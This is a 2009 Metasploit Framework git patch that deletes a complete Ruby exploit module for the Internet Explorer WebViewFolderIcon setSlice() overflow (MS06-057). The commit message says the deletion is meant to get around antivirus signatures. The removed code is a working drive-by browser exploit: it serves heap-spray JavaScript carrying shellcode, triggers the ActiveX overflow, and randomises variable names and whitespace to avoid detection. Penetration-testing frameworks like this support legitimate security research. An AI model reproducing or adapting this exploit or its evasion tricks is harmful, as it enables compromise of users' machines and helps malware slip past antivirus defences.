From 0a52c98e03875e7d8c4c93d63ffe704133573f17 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 4 Nov 2009 03:50:31 +0000
Subject: [PATCH] Purging this module due to lame AV sigs, re-adding in a
 sillier form

git-svn-id: file:///home/svn/framework3/trunk@7345 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../browser/ms06_057_webview_setslice.rb      | 126 ------------------
 1 file changed, 126 deletions(-)
 delete mode 100644 modules/exploits/windows/browser/ms06_057_webview_setslice.rb

diff --git a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb
deleted file mode 100644
index 333b25d0e7..0000000000
--- a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb
+++ /dev/null
@@ -1,126 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
-			'Description'    => %q{
-				This module exploits a flaw in the WebViewFolderIcon ActiveX control
-			included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
-			during the Month of Browser Bugs project (MoBB #18).
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => 
-				[ 
-					'hdm', 
-				],
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
-					[ 'CVE', '2006-3730'],
-					[ 'OSVDB', '27110' ],
-					[ 'MSB', 'MS06-057'], 
-					[ 'BID', '19030' ],
-					[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
-				],
-			'Payload'        =>
-				{
-					'Space'          => 1024,
-					'BadChars'       => "\x00",
-	
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
-				],
-			'DefaultTarget'  => 0))
-	end
-
-	def on_request_uri(cli, request)
-
-		# Re-generate the payload
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		# Encode the shellcode
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-		
-		# Get a unicode friendly version of the return address
-		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]
-
-		# Randomize the javascript variable names	
-		var_buffer    = rand_text_alpha(rand(30)+2)
-		var_shellcode = rand_text_alpha(rand(30)+2)
-		var_unescape  = rand_text_alpha(rand(30)+2)
-		var_x         = rand_text_alpha(rand(30)+2)
-		var_i         = rand_text_alpha(rand(30)+2)
-		var_tic       = rand_text_alpha(rand(30)+2)
-		var_toc       = rand_text_alpha(rand(30)+2)
-		
-		# Randomize HTML data
-		html          = rand_text_alpha(rand(30)+2)
-		
-		# Build out the message
-		content = %Q|
-<html>
-<head>
-	<script>
-	try {
-	
-	var #{var_unescape}  = unescape ;
-	var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
-	
-	var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
-	while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;
-
-	var #{var_x} = new Array() ;	
-	for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
-		#{var_x}[ #{var_i} ] = 		
-			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
-	}
-	
-	
-   	for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
-		var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );	
-		try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }
-		var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
-	}
-	
-	} catch( e ) { window.location = 'about:blank' ; }
-	
-	</script>
-</head>
-<body>
-#{html}
-</body>
-</html>		
-		|
-
-		content = Rex::Text.randomize_space(content)
-
-		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
-
-		# Transmit the response to the client
-		send_response_html(cli, content)
-		
-		# Handle the payload
-		handler(cli)		
-	end
-
-end